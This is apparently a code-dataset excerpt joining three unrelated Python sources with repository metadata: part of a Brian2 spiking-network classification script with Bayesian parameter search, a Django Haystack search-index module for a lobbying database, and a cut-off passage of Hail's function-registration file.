Synapsis): for i in range(n_post): a = Synapsis.w[np.where(Synapsis._synaptic_post == i)[0]] Synapsis.w[np.where(Synapsis._synaptic_post == i)[0]] = a / np.linalg.norm(a) def np_extend(self, a, b, axis=0): if a is None: shape = list(b.shape) shape[axis] = 0 a = np.array([]).reshape(tuple(shape)) return np.append(a, b, axis) def np_append(self, a, b): shape = list(b.shape) shape.insert(0, -1) if a is None: a = np.array([]).reshape(tuple(shape)) return np.append(a, b.reshape(tuple(shape)), axis=0) def parameters_GS(self, *args, **kwargs): #--------------- # args = [(min,max),] # kwargs = {'parameter' = number,} #--------------- parameters = np.zeros(tuple(kwargs.values()), [(x, float) for x in kwargs.keys()]) grids = np.meshgrid(*[np.linspace(min_max[0], min_max[1], scale) for min_max,scale in zip(args,kwargs.values())], indexing='ij') for index, parameter in enumerate(kwargs.keys()): parameters[parameter] = grids[index] parameters = parameters.reshape(-1) return parameters class Readout(): def readout_sk(self, X_train, X_test, y_train, y_test, **kwargs): from sklearn.linear_model import LogisticRegression lr = LogisticRegression(**kwargs) lr.fit(X_train.T, y_train.T) y_train_predictions = lr.predict(X_train.T) y_test_predictions = lr.predict(X_test.T) return accuracy_score(y_train_predictions, y_train.T), accuracy_score(y_test_predictions, y_test.T) class Result(): def __init__(self): pass def result_save(self, path, *arg, **kwarg): if os.path.exists(path): os.remove(path) fw = open(path, 'wb') pickle.dump(kwarg, fw) fw.close() def result_pick(self, path): fr = open(path, 'rb') data = pickle.load(fr) fr.close() return data def animation(self, t, v, interval, duration, a_step=10, a_interval=100, a_duration=10): xs = LinearScale() ys = LinearScale() line = Lines(x=t[:interval], y=v[:, :interval], scales={'x': xs, 'y': ys}) xax = Axis(scale=xs, label='x', grid_lines='solid') yax = Axis(scale=ys, orientation='vertical', tick_format='0.2f', label='y', grid_lines='solid') fig = Figure(marks=[line], axes=[xax, yax], animation_duration=a_duration) def on_value_change(change): line.x = t[change['new']:interval + change['new']] line.y = v[:, change['new']:interval + change['new']] play = widgets.Play( interval=a_interval, value=0, min=0, max=duration, step=a_step, description="Press play", disabled=False ) slider = widgets.IntSlider(min=0, max=duration) widgets.jslink((play, 'value'), (slider, 'value')) slider.observe(on_value_change, names='value') return play, slider, fig class Jv_classification(): def __init__(self, coding_duration): self.coding_duration = coding_duration def load_Data_Jv(self, t, path_value, path_label, is_norm=True): if t == "train": label = np.loadtxt(path_label, delimiter=None).astype(int)[1] elif t == "test": label = np.loadtxt(path_label, delimiter=None).astype(int)[0] else: raise TypeError("t must be 'train' or 'test'") data = np.loadtxt(path_value, delimiter=None) if is_norm: data = MinMaxScaler().fit_transform(data) s = open(path_value, 'r') i = -1 size = [] while True: lines = s.readline() i += 1 if not lines: break if lines == '\n': # "\n" needed to be added at the end of the file i -= 1 size.append(i) continue size_d = np.concatenate(([0], (np.asarray(size) + 1))) data_list = [data[size_d[i]:size_d[i + 1]] for i in range(len(size_d) - 1)] label_list = [] j = 0 for n in label: label_list.extend([j] * n) j += 1 data_frame = pd.DataFrame({'value': pd.Series(data_list), 'label': pd.Series(label_list)}) return data_frame def load_Data_Jv_all(self, path, is_norm=True): self.train = self.load_Data_Jv('train', path + 'train.txt', path + 'size.txt', is_norm) self.test = self.load_Data_Jv('test', path + 'test.txt', path + 'size.txt', is_norm) def select_data(self, fraction, data_frame, is_order=True, **kwargs): try: selected = kwargs['selected'] except KeyError: selected = np.arange(9) if is_order: data_frame_selected = data_frame[data_frame['label'].isin(selected)].sample( frac=fraction).sort_index().reset_index(drop=True) else: data_frame_selected = data_frame[data_frame['label'].isin(selected)].sample(frac=fraction).reset_index( drop=True) return data_frame_selected def _encoding_cos(self, x, n, A): encoding = [] for i in range(int(n)): trans_cos = np.around(0.5 * A * (np.cos(x + np.pi * (i / n)) + 1)).clip(0, A - 1) coding = [([0] * trans_cos.shape[1]) for i in range(A * trans_cos.shape[0])] for index_0, p in enumerate(trans_cos): for index_1, q in enumerate(p): coding[int(q) + A * index_0][index_1] = 1 encoding.extend(coding) return np.asarray(encoding) def _encoding_cos_rank(self, x, n, A): encoding = np.zeros((x.shape[0] * A, n * x.shape[1]), dtype='<i1') for i in range(int(n)): trans_cos = np.around(0.5 * A * (np.cos(x + np.pi * (i / n)) + 1)).clip(0, A - 1) for index_0, p in enumerate(trans_cos): for index_1, q in enumerate(p): encoding[int(q) + A * index_0, index_1 * n + i] = 1 return np.asarray(encoding) def encoding_latency_Jv(self, coding_f, analog_data, coding_n, min=0, max=np.pi): f = lambda x: (max - min) * (x - np.min(x)) / (np.max(x) - np.min(x)) value = analog_data['value'].apply(f).apply(coding_f, n=coding_n, A=int(self.coding_duration)) return pd.DataFrame({'value': pd.Series(value), 'label': pd.Series(analog_data['label'])}) def get_series_data_list(self, data_frame, is_group=False): data_frame_s = [] if not is_group: for value in data_frame['value']: data_frame_s.extend(value) else: for value in data_frame['value']: data_frame_s.append(value) label = data_frame['label'] return np.asarray(data_frame_s), label ################################### # -----simulation parameter setting------- coding_n = 3 dim = 12 coding_duration = 10 F_train = 1 F_test = 1 Dt = defaultclock.dt = 1 * ms #-------class initialization---------------------- function = Function() base = Base() readout = Readout() result = Result() Jv = Jv_classification(coding_duration) # -------data initialization---------------------- Jv.load_Data_Jv_all(data_path) df_train = Jv.select_data(F_train, Jv.train, False) df_test = Jv.select_data(F_test, Jv.test, False) df_en_train = Jv.encoding_latency_Jv(Jv._encoding_cos_rank, df_train, coding_n) df_en_test = Jv.encoding_latency_Jv(Jv._encoding_cos_rank, df_test, coding_n) data_train_s, label_train = Jv.get_series_data_list(df_en_train, is_group=True) data_test_s, label_test = Jv.get_series_data_list(df_en_test, is_group=True) #-------get numpy random state------------ np_state = np.random.get_state() ############################################ # ---- define network run function---- def run_net(inputs, **parameter): #---- set numpy random state for each run---- np.random.set_state(np_state) # -----parameter setting------- n_ex = 400 n_inh = int(n_ex/4) n_input = dim * coding_n n_read = n_ex+n_inh R = parameter['R'] f = parameter['f'] A_EE = 30*f A_EI = 60*f A_IE = 19*f A_II = 19*f A_inE = 18*f A_inI = 9*f tau_ex = parameter['tau']*coding_duration tau_inh = parameter['tau']*coding_duration tau_read= 30 p_inE = 0.1 p_inI = 0.1 #------definition of equation------------- neuron_in = ''' I = stimulus(t,i) : 1 ''' neuron = ''' tau : 1 dv/dt = (I-v) / (tau*ms) : 1 (unless refractory) dg/dt = (-g)/(3*ms) : 1 dh/dt = (-h)/(6*ms) : 1 I = (g+h)+13.5: 1 x : 1 y : 1 z : 1 ''' neuron_read = ''' tau : 1 dv/dt = (I-v) / (tau*ms) : 1 dg/dt = (-g)/(3*ms) : 1 dh/dt = (-h)/(6*ms) : 1 I = (g+h): 1 ''' synapse = ''' w : 1 ''' on_pre_ex = ''' g+=w ''' on_pre_inh = ''' h-=w ''' # -----Neurons and Synapses setting------- Input = NeuronGroup(n_input, neuron_in, threshold='I > 0', method='euler', refractory=0 * ms, name = 'neurongroup_input') G_ex = NeuronGroup(n_ex, neuron, threshold='v > 15', reset='v = 13.5', method='euler', refractory=3 * ms, name ='neurongroup_ex') G_inh = NeuronGroup(n_inh, neuron, threshold='v > 15', reset='v = 13.5', method='euler', refractory=2 * ms, name ='neurongroup_in') G_readout = NeuronGroup(n_read, neuron_read, method='euler', name='neurongroup_read') S_inE = Synapses(Input, G_ex, synapse, on_pre = on_pre_ex ,method='euler', name='synapses_inE') S_inI = Synapses(Input, G_inh, synapse, on_pre = on_pre_ex ,method='euler', name='synapses_inI') S_EE = Synapses(G_ex, G_ex, synapse, on_pre = on_pre_ex ,method='euler', name='synapses_EE') S_EI = Synapses(G_ex, G_inh, synapse, on_pre = on_pre_ex ,method='euler', name='synapses_EI') S_IE = Synapses(G_inh, G_ex, synapse, on_pre = on_pre_inh ,method='euler', name='synapses_IE') S_II = Synapses(G_inh, G_inh, synapse, on_pre = on_pre_inh ,method='euler', name='synapses_I') S_E_readout = Synapses(G_ex, G_readout, 'w = 1 : 1', on_pre=on_pre_ex, method='euler') S_I_readout = Synapses(G_inh, G_readout, 'w = 1 : 1', on_pre=on_pre_inh, method='euler') #-------initialization of neuron parameters---------- G_ex.v = '13.5+1.5*rand()' G_inh.v = '13.5+1.5*rand()' G_readout.v = '0' G_ex.g = '0' G_inh.g = '0' G_readout.g = '0' G_ex.h = '0' G_inh.h = '0' G_readout.h = '0' G_ex.tau = tau_ex G_inh.tau = tau_inh G_readout.tau = tau_read [G_ex,G_in] = base.allocate([G_ex,G_inh],5,5,20) # -------initialization of network topology and synapses parameters---------- S_inE.connect(condition='j<0.3*N_post', p = p_inE) S_inI.connect(condition='j<0.3*N_post', p = p_inI) S_EE.connect(condition='i != j', p='0.3*exp(-((x_pre-x_post)**2+(y_pre-y_post)**2+(z_pre-z_post)**2)/R**2)') S_EI.connect(p='0.2*exp(-((x_pre-x_post)**2+(y_pre-y_post)**2+(z_pre-z_post)**2)/R**2)') S_IE.connect(p='0.4*exp(-((x_pre-x_post)**2+(y_pre-y_post)**2+(z_pre-z_post)**2)/R**2)') S_II.connect(condition='i != j', p='0.1*exp(-((x_pre-x_post)**2+(y_pre-y_post)**2+(z_pre-z_post)**2)/R**2)') S_E_readout.connect(j='i') S_I_readout.connect(j='i+n_ex') S_inE.w = function.gamma(A_inE, S_inE.w.shape) S_inI.w = function.gamma(A_inI, S_inI.w.shape) S_EE.w = function.gamma(A_EE, S_EE.w.shape) S_IE.w = function.gamma(A_IE, S_IE.w.shape) S_EI.w = function.gamma(A_EI, S_EI.w.shape) S_II.w = function.gamma(A_II, S_II.w.shape) S_EE.pre.delay = '1.5*ms' S_EI.pre.delay = '0.8*ms' S_IE.pre.delay = '0.8*ms' S_II.pre.delay = '0.8*ms' # ------create network------------- net = Network(collect()) net.store('init') # ------run network------------- stimulus = TimedArray(inputs[0], dt=Dt) duration = inputs[0].shape[0] net.run(duration * Dt) states = net.get_states()['neurongroup_read']['v'] net.restore('init') return (states, inputs[1]) def parameters_search(**parameter): # ------parallel run for train------- states_train_list = pool.map(partial(run_net, **parameter), [(x) for x in zip(data_train_s, label_train)]) # ----parallel run for test-------- states_test_list = pool.map(partial(run_net, **parameter), [(x) for x in zip(data_test_s, label_test)]) # ------Readout--------------- states_train, states_test, _label_train, _label_test = [], [], [], [] for train in states_train_list : states_train.append(train[0]) _label_train.append(train[1]) for test in states_test_list: states_test.append(test[0]) _label_test.append(test[1]) states_train = (MinMaxScaler().fit_transform(np.asarray(states_train))).T states_test = (MinMaxScaler().fit_transform(np.asarray(states_test))).T score_train, score_test = readout.readout_sk(states_train, states_test, np.asarray(_label_train), np.asarray(_label_test), solver="lbfgs", multi_class="multinomial") # ----------show results----------- print('parameters %s' % parameter) print('Train score: ', score_train) print('Test score: ', score_test) return score_test ########################################## # -------BO parameters search--------------- if __name__ == '__main__': core = 10 pool = Pool(core) optimizer = bayes_opt.BayesianOptimization( f=parameters_search, pbounds={'R': (0.01, 2), 'f': (0.01, 2), 'tau':(0.01, 2)}, verbose=2, random_state=np.random.RandomState(), ) # from bayes_opt.util import load_logs # load_logs(optimizer, logs=["./BO_res_Jv.json"]) logger = bayes_opt.observer.JSONLogger(path="./BO_res_Jv.json") optimizer.subscribe(bayes_opt.event.Events.OPTMIZATION_STEP, logger) optimizer.maximize( init_points=10, n_iter=200, acq='ucb', kappa=2.576, xi=0.0, )
02de053f7a35ad14f7c9469e279ff827159d5414
904bf81488ce47c93453a8a841403e831f03ebe0
/tx_lobbying/search_indexes.py
edb9f8e6255ec97382048159f312a5a1398c6c77
[ "Apache-2.0" ]
permissive
texastribune/tx_lobbying
b7b26ed8acb6059f46bf1e4285af69398795b074
81dd911667e5368b874a56d5fba8e1613f7027ee
refs/heads/master
2020-04-01T09:25:11.457807
2015-05-19T03:34:53
2015-05-19T03:34:53
7,674,962
1
3
null
2015-05-28T03:08:54
2013-01-17T21:47:06
Python
UTF-8
Python
false
false
920
py
""" Haystack search indicies. I denormalize thing here to try and make things easier on the database later. """ from haystack import indexes from .models import Lobbyist, Interest class LobbyistIndex(indexes.SearchIndex, indexes.Indexable): text = indexes.CharField(model_attr='name', document=True) content_auto = indexes.EdgeNgramField(model_attr='name') url = indexes.CharField() def get_model(self): return Lobbyist def get_updated_field(self): return 'updated_at' def prepare_url(self, obj): return obj.get_absolute_url() class InterestIndex(indexes.SearchIndex, indexes.Indexable): text = indexes.CharField(model_attr='name', document=True) content_auto = indexes.EdgeNgramField(model_attr='name') url = indexes.CharField() def get_model(self): return Interest def prepare_url(self, obj): return obj.get_absolute_url()
a283425bbb4f90949b0edfcd5f68564d3833b84f
050d5f569497b8e04272b2b6955ac6f844e094e7
/hail/python/hail/ir/register_functions.py
814b1dbcbd0074c87fe410eb5acaeab94fbd9ce5
[ "MIT" ]
permissive
steveherrin/hail
a68460870aa8207de628ee2054a7af889ef8e07c
edd724faf9443d37cca6a22d4c0a2af939130427
refs/heads/master
2020-07-29T14:03:50.642849
2019-09-20T16:11:21
2019-09-20T16:11:21
null
0
0
null
null
null
null
UTF-8
Python
false
false
23,551
py
import hail as hl from hail.expr.nat import NatVariable from .ir import register_function, register_session_function, register_seeded_function def register_reference_genome_functions(rg): from hail.expr.types import dtype register_session_function(f"isValidContig({rg})", (dtype("str"),), dtype("bool")) register_session_function(f"isValidLocus({rg})", (dtype("str"),dtype("int32"),), dtype("bool")) register_session_function(f"getReferenceSequenceFromValidLocus({rg})", (dtype("str"),dtype("int32"),dtype("int32"),dtype("int32"),), dtype("str")) register_session_function(f"getReferenceSequence({rg})", (dtype("str"),dtype("int32"),dtype("int32"),dtype("int32"),), dtype("str")) def register_functions(): from hail.expr.types import dtype register_function("flatten", (dtype("array<array<?T>>"),), dtype("array<?T>")) register_function("difference", (dtype("set<?T>"),dtype("set<?T>"),), dtype("set<?T>")) register_function("median", (dtype("set<?T:numeric>"),), dtype("?T")) register_function("median", (dtype("array<?T:numeric>"),), dtype("?T")) register_function("uniqueMinIndex", (dtype("array<?T>"),), dtype("int32")) register_function("mean", (dtype("array<?T:numeric>"),), dtype("float64")) register_function("toFloat32", (dtype("?T:numeric"),), dtype("float32")) register_function("uniqueMaxIndex", (dtype("array<?T>"),), dtype("int32")) register_function("toSet", (dtype("array<?T>"),), dtype("set<?T>")) def array_floating_point_divide(arg_type, ret_type): register_function("/", (arg_type, hl.tarray(arg_type),), hl.tarray(ret_type)) register_function("/", (hl.tarray(arg_type),arg_type), hl.tarray(ret_type)) register_function("/", (hl.tarray(arg_type),hl.tarray(arg_type)), hl.tarray(ret_type)) array_floating_point_divide(hl.tint32, hl.tfloat32) array_floating_point_divide(hl.tint64, hl.tfloat32) array_floating_point_divide(hl.tfloat32, hl.tfloat32) array_floating_point_divide(hl.tfloat64, hl.tfloat64) def ndarray_floating_point_divide(arg_type, ret_type): register_function("/", (arg_type, hl.tndarray(arg_type, NatVariable()),), hl.tndarray(ret_type, NatVariable())) register_function("/", (hl.tndarray(arg_type, NatVariable()), arg_type), hl.tndarray(ret_type, NatVariable())) register_function("/", (hl.tndarray(arg_type, NatVariable()), hl.tndarray(arg_type, NatVariable())), hl.tndarray(ret_type, NatVariable())) ndarray_floating_point_divide(hl.tint32, hl.tfloat32) ndarray_floating_point_divide(hl.tint64, hl.tfloat32) ndarray_floating_point_divide(hl.tfloat32, hl.tfloat32) ndarray_floating_point_divide(hl.tfloat64, hl.tfloat64) register_function("values", (dtype("dict<?key, ?value>"),), dtype("array<?value>")) register_function("[*:]", (dtype("array<?T>"),dtype("int32"),), dtype("array<?T>")) register_function("[*:]", (dtype("str"),dtype("int32"),), dtype("str")) register_function("get", (dtype("dict<?key, ?value>"),dtype("?key"),), dtype("?value")) register_function("get", (dtype("dict<?key, ?value>"),dtype("?key"),dtype("?value"),), dtype("?value")) register_function("max", (dtype("array<?T:numeric>"),), dtype("?T")) register_function("nanmax", (dtype("array<?T:numeric>"),), dtype("?T")) register_function("max", (dtype("?T"),dtype("?T"),), dtype("?T")) register_function("nanmax", (dtype("?T"),dtype("?T"),), dtype("?T")) register_function("max_ignore_missing", (dtype("?T"),dtype("?T"),), dtype("?T")) register_function("nanmax_ignore_missing", (dtype("?T"),dtype("?T"),), dtype("?T")) register_function("product", (dtype("array<?T:numeric>"),), dtype("?T")) register_function("toInt32", (dtype("?T:numeric"),), dtype("int32")) register_function("extend", (dtype("array<?T>"),dtype("array<?T>"),), dtype("array<?T>")) register_function("argmin", (dtype("array<?T>"),), dtype("int32")) register_function("toFloat64", (dtype("?T:numeric"),), dtype("float64")) register_function("sort", (dtype("array<?T>"),), dtype("array<?T>")) register_function("sort", (dtype("array<?T>"),dtype("bool"),), dtype("array<?T>")) register_function("isSubset", (dtype("set<?T>"),dtype("set<?T>"),), dtype("bool")) register_function("[*:*]", (dtype("str"),dtype("int32"),dtype("int32"),), dtype("str")) register_function("[*:*]", (dtype("array<?T>"),dtype("int32"),dtype("int32"),), dtype("array<?T>")) register_function("+", (dtype("array<?T:numeric>"),dtype("array<?T>"),), dtype("array<?T>")) register_function("+", (dtype("array<?T:numeric>"),dtype("?T"),), dtype("array<?T>")) register_function("+", (dtype("?T:numeric"),dtype("array<?T>"),), dtype("array<?T>")) register_function("+", (dtype("ndarray<?T:numeric, ?nat>"),dtype("ndarray<?T, ?nat>"),), dtype("ndarray<?T, ?nat>")) register_function("+", (dtype("ndarray<?T:numeric, ?nat>"), dtype("?T"),), dtype("ndarray<?T, ?nat>")) register_function("+", (dtype("?T:numeric"),dtype("ndarray<?T, ?nat>"),), dtype("ndarray<?T, ?nat>")) register_function("**", (dtype("array<?T:numeric>"),dtype("array<?T>"),), dtype("array<float64>")) register_function("**", (dtype("array<?T:numeric>"),dtype("?T"),), dtype("array<float64>")) register_function("**", (dtype("?T:numeric"),dtype("array<?T>"),), dtype("array<float64>")) register_function("**", (dtype("ndarray<?T:numeric, ?nat>"),dtype("ndarray<?T, ?nat>"),), dtype("ndarray<?T, ?nat>")) register_function("**", (dtype("ndarray<?T:numeric, ?nat>"),dtype("?T"),), dtype("ndarray<?T, ?nat>")) register_function("**", (dtype("?T:numeric"),dtype("ndarray<?T, ?nat>"),), dtype("ndarray<?T, ?nat>")) register_function("append", (dtype("array<?T>"),dtype("?T"),), dtype("array<?T>")) register_function("[:*]", (dtype("str"),dtype("int32"),), dtype("str")) register_function("[:*]", (dtype("array<?T>"),dtype("int32"),), dtype("array<?T>")) register_function("remove", (dtype("set<?T>"),dtype("?T"),), dtype("set<?T>")) register_function("[]", (dtype("str"),dtype("int32"),), dtype("str")) register_function("indexArray", (dtype("array<?T>"),dtype("int32"),), dtype("?T")) register_function("[]", (dtype("dict<?key, ?value>"),dtype("?key"),), dtype("?value")) register_function("dictToArray", (dtype("dict<?key, ?value>"),), dtype("array<tuple(?key, ?value)>")) register_function("%", (dtype("array<?T:numeric>"),dtype("array<?T>"),), dtype("array<?T>")) register_function("%", (dtype("array<?T:numeric>"),dtype("?T"),), dtype("array<?T>")) register_function("%", (dtype("?T:numeric"),dtype("array<?T>"),), dtype("array<?T>")) register_function("%", (dtype("ndarray<?T:numeric, ?nat>"),dtype("ndarray<?T, ?nat>"),), dtype("ndarray<?T, ?nat>")) register_function("%", (dtype("ndarray<?T:numeric, ?nat>"),dtype("?T"),), dtype("ndarray<?T, ?nat>")) register_function("%", (dtype("?T:numeric"),dtype("ndarray<?T, ?nat>"),), dtype("ndarray<?T, ?nat>")) register_function("dict", (dtype("array<tuple(?key, ?value)>"),), dtype("dict<?key, ?value>")) register_function("dict", (dtype("set<tuple(?key, ?value)>"),), dtype("dict<?key, ?value>")) register_function("keys", (dtype("dict<?key, ?value>"),), dtype("array<?key>")) register_function("min", (dtype("array<?T:numeric>"),), dtype("?T")) register_function("nanmin", (dtype("array<?T:numeric>"),), dtype("?T")) register_function("min", (dtype("?T"),dtype("?T"),), dtype("?T")) register_function("nanmin", (dtype("?T"),dtype("?T"),), dtype("?T")) register_function("min_ignore_missing", (dtype("?T"),dtype("?T"),), dtype("?T")) register_function("nanmin_ignore_missing", (dtype("?T"),dtype("?T"),), dtype("?T")) register_function("sum", (dtype("array<?T:numeric>"),), dtype("?T")) register_function("toInt64", (dtype("?T:numeric"),), dtype("int64")) register_function("contains", (dtype("dict<?key, ?value>"),dtype("?key"),), dtype("bool")) register_function("contains", (dtype("array<?T>"),dtype("?T"),), dtype("bool")) register_function("contains", (dtype("set<?T>"),dtype("?T"),), dtype("bool")) register_function("-", (dtype("array<?T:numeric>"),dtype("?T"),), dtype("array<?T>")) register_function("-", (dtype("array<?T:numeric>"),dtype("array<?T>"),), dtype("array<?T>")) register_function("-", (dtype("?T:numeric"),dtype("array<?T>"),), dtype("array<?T>")) register_function("-", (dtype("ndarray<?T:numeric, ?nat>"),dtype("ndarray<?T, ?nat>"),), dtype("ndarray<?T, ?nat>")) register_function("-", (dtype("ndarray<?T:numeric, ?nat>"),dtype("?T"),), dtype("ndarray<?T, ?nat>")) register_function("-", (dtype("?T:numeric"),dtype("ndarray<?T, ?nat>"),), dtype("ndarray<?T, ?nat>")) register_function("addone", (dtype("int32"),), dtype("int32")) register_function("isEmpty", (dtype("dict<?key, ?value>"),), dtype("bool")) register_function("isEmpty", (dtype("array<?T>"),), dtype("bool")) register_function("isEmpty", (dtype("set<?T>"),), dtype("bool")) register_function("[:]", (dtype("array<?T>"),), dtype("array<?T>")) register_function("[:]", (dtype("str"),), dtype("str")) register_function("union", (dtype("set<?T>"),dtype("set<?T>"),), dtype("set<?T>")) register_function("*", (dtype("array<?T:numeric>"),dtype("array<?T>"),), dtype("array<?T>")) register_function("*", (dtype("array<?T:numeric>"),dtype("?T"),), dtype("array<?T>")) register_function("*", (dtype("?T:numeric"),dtype("array<?T>"),), dtype("array<?T>")) register_function("*", (dtype("ndarray<?T:numeric, ?nat>"),dtype("ndarray<?T, ?nat>"),), dtype("ndarray<?T, ?nat>")) register_function("*", (dtype("ndarray<?T:numeric, ?nat>"),dtype("?T"),), dtype("ndarray<?T, ?nat>")) register_function("*", (dtype("?T:numeric"),dtype("ndarray<?T, ?nat>"),), dtype("ndarray<?T, ?nat>")) register_function("intersection", (dtype("set<?T>"),dtype("set<?T>"),), dtype("set<?T>")) register_function("add", (dtype("set<?T>"),dtype("?T"),), dtype("set<?T>")) register_function("argmax", (dtype("array<?T>"),), dtype("int32")) register_function("//", (dtype("array<?T:numeric>"),dtype("array<?T>"),), dtype("array<?T>")) register_function("//", (dtype("array<?T:numeric>"),dtype("?T"),), dtype("array<?T>")) register_function("//", (dtype("?T:numeric"),dtype("array<?T>"),), dtype("array<?T>")) register_function("//", (dtype("ndarray<?T:numeric, ?nat>"),dtype("ndarray<?T, ?nat>"),), dtype("ndarray<?T, ?nat>")) register_function("//", (dtype("ndarray<?T:numeric, ?nat>"),dtype("?T"),), dtype("ndarray<?T, ?nat>")) register_function("//", (dtype("?T:numeric"),dtype("ndarray<?T, ?nat>"),), dtype("ndarray<?T, ?nat>")) register_function("keySet", (dtype("dict<?key, ?value>"),), dtype("set<?key>")) register_function("qnorm", (dtype("float64"),), dtype("float64")) register_function("oneHotAlleles", (dtype("call"),dtype("int32"),), dtype("array<int32>")) register_function("dpois", (dtype("float64"),dtype("float64"),dtype("bool"),), dtype("float64")) register_function("dpois", (dtype("float64"),dtype("float64"),), dtype("float64")) register_function("ploidy", (dtype("call"),), dtype("int32")) register_function("||", (dtype("bool"),dtype("bool"),), dtype("bool")) register_function("ppois", (dtype("float64"),dtype("float64"),dtype("bool"),dtype("bool"),), dtype("float64")) register_function("ppois", (dtype("float64"),dtype("float64"),), dtype("float64")) register_function("log10", (dtype("float64"),), dtype("float64")) register_function("isHet", (dtype("call"),), dtype("bool")) register_function("isAutosomalOrPseudoAutosomal", (dtype("?T:locus"),), dtype("bool")) register_function("testCodeUnification", (dtype("?x:numeric"),dtype("?x:int32"),), dtype("?x")) register_seeded_function("rand_pois", (dtype("float64"),), dtype("float64")) register_seeded_function("rand_pois", (dtype("int32"),dtype("float64"),), dtype("array<float64>")) register_function("toFloat32", (dtype("str"),), dtype("float32")) register_function("toFloat32", (dtype("bool"),), dtype("float32")) register_function("isAutosomal", (dtype("?T:locus"),), dtype("bool")) register_function("isPhased", (dtype("call"),), dtype("bool")) register_function("isHomVar", (dtype("call"),), dtype("bool")) register_function("corr", (dtype("array<float64>"),dtype("array<float64>"),), dtype("float64")) register_function("log", (dtype("float64"),dtype("float64"),), dtype("float64")) register_function("log", (dtype("float64"),), dtype("float64")) register_function("foobar2", (), dtype("int32")) register_function("approxEqual", (dtype("float64"),dtype("float64"),dtype("float64"),dtype("bool"),dtype("bool"),), dtype("bool")) register_function("plDosage", (dtype("array<?N:int32>"),), dtype("float64")) register_function("includesEnd", (dtype("interval<?T>"),), dtype("bool")) register_function("position", (dtype("?T:locus"),), dtype("int32")) register_seeded_function("rand_unif", (dtype("float64"),dtype("float64"),), dtype("float64")) register_function("str", (dtype("?T"),), dtype("str")) register_function("valuesSimilar", (dtype("?T"),dtype("?T"),dtype('float64'),dtype('bool'),), dtype("bool")) register_function("replace", (dtype("str"),dtype("str"),dtype("str"),), dtype("str")) register_function("exp", (dtype("float64"),), dtype("float64")) register_function("&&", (dtype("bool"),dtype("bool"),), dtype("bool")) register_function("compare", (dtype("int32"),dtype("int32"),), dtype("int32")) register_function("triangle", (dtype("int32"),), dtype("int32")) register_function("Interval", (dtype("?T"),dtype("?T"),dtype("bool"),dtype("bool"),), dtype("interval<?T>")) register_function("contig", (dtype("?T:locus"),), dtype("str")) register_function("Call", (dtype("bool"),), dtype("call")) register_function("Call", (dtype("str"),), dtype("call")) register_function("Call", (dtype("int32"),dtype("bool"),), dtype("call")) register_function("Call", (dtype("int32"),dtype("int32"),dtype("bool"),), dtype("call")) register_function("Call", (dtype("array<int32>"),dtype("bool"),), dtype("call")) register_function("qchisqtail", (dtype("float64"),dtype("float64"),), dtype("float64")) register_function("binomTest", (dtype("int32"),dtype("int32"),dtype("float64"),dtype("int32"),), dtype("float64")) register_function("qpois", (dtype("float64"),dtype("float64"),), dtype("int32")) register_function("qpois", (dtype("float64"),dtype("float64"),dtype("bool"),dtype("bool"),), dtype("int32")) register_function("is_finite", (dtype("float32"),), dtype("bool")) register_function("is_finite", (dtype("float64"),), dtype("bool")) register_function("inYPar", (dtype("?T:locus"),), dtype("bool")) register_function("contingency_table_test", (dtype("int32"),dtype("int32"),dtype("int32"),dtype("int32"),dtype("int32"),), dtype("struct{p_value: float64, odds_ratio: float64}")) register_function("toInt32", (dtype("bool"),), dtype("int32")) register_function("toInt32", (dtype("str"),), dtype("int32")) register_function("foobar1", (), dtype("int32")) register_function("toFloat64", (dtype("str"),), dtype("float64")) register_function("toFloat64", (dtype("bool"),), dtype("float64")) register_function("dbeta", (dtype("float64"),dtype("float64"),dtype("float64"),), dtype("float64")) register_function("Locus", (dtype("str"),), dtype("?T:locus")) register_function("Locus", (dtype("str"), dtype("int32"),), dtype("?T:locus")) register_function("LocusAlleles", (dtype("str"),), dtype("struct{locus: ?T, alleles: array<str>}")) register_function("LocusInterval", (dtype("str"),dtype("bool"),), dtype("interval<?T:locus>")) register_function("LocusInterval", (dtype("str"),dtype("int32"),dtype("int32"),dtype("bool"),dtype("bool"),dtype("bool"),), dtype("interval<?T:locus>")) register_function("globalPosToLocus", (dtype("int64"),), dtype("?T:locus")) register_function("locusToGlobalPos", (dtype("?T:locus"),), dtype("int64")) register_function("liftoverLocus", (dtype(f"?T:locus"), dtype('float64'),), dtype(f"struct{{result:?U:locus,is_negative_strand:bool}}")) register_function("liftoverLocusInterval", (dtype(f"interval<?T:locus>"), dtype('float64'),), dtype(f"struct{{result:interval<?U:locus>,is_negative_strand:bool}}")) register_function("min_rep", (dtype("?T:locus"),dtype("array<str>"),), dtype("struct{locus: ?T, alleles: array<str>}")) register_function("locus_windows_per_contig", (dtype("array<array<float64>>"),dtype("float64"),), dtype("tuple(array<int32>, array<int32>)")) register_function("toBoolean", (dtype("str"),), dtype("bool")) register_seeded_function("rand_bool", (dtype("float64"),), dtype("bool")) register_function("pchisqtail", (dtype("float64"),dtype("float64"),), dtype("float64")) register_seeded_function("rand_cat", (dtype("array<float64>"),), dtype("int32")) register_function("inYNonPar", (dtype("?T:locus"),), dtype("bool")) register_function("+", (dtype("str"),dtype("str"),), dtype("str")) register_function("**", (dtype("float32"),dtype("float32"),), dtype("float64")) register_function("**", (dtype("int32"),dtype("int32"),), dtype("float64")) register_function("**", (dtype("int64"),dtype("int64"),), dtype("float64")) register_function("**", (dtype("float64"),dtype("float64"),), dtype("float64")) register_function("length", (dtype("str"),), dtype("int32")) register_function("slice", (dtype("str"),dtype("int32"),dtype("int32"),), dtype("str")) register_function("split", (dtype("str"),dtype("str"),dtype("int32"),), dtype("array<str>")) register_function("split", (dtype("str"),dtype("str"),), dtype("array<str>")) register_seeded_function("rand_gamma", (dtype("float64"),dtype("float64"),), dtype("float64")) register_function("UnphasedDiploidGtIndexCall", (dtype("int32"),), dtype("call")) register_function("[]", (dtype("call"),dtype("int32"),), dtype("int32")) register_function("sign", (dtype("int64"),), dtype("int64")) register_function("sign", (dtype("float64"),), dtype("float64")) register_function("sign", (dtype("float32"),), dtype("float32")) register_function("sign", (dtype("int32"),), dtype("int32")) register_function("unphasedDiploidGtIndex", (dtype("call"),), dtype("int32")) register_function("gamma", (dtype("float64"),), dtype("float64")) register_function("%", (dtype("float64"),dtype("float64"),), dtype("float64")) register_function("%", (dtype("int64"),dtype("int64"),), dtype("int64")) register_function("%", (dtype("float32"),dtype("float32"),), dtype("float32")) register_function("%", (dtype("int32"),dtype("int32"),), dtype("int32")) register_function("fisher_exact_test", (dtype("int32"),dtype("int32"),dtype("int32"),dtype("int32"),), dtype("struct{p_value: float64, odds_ratio: float64, 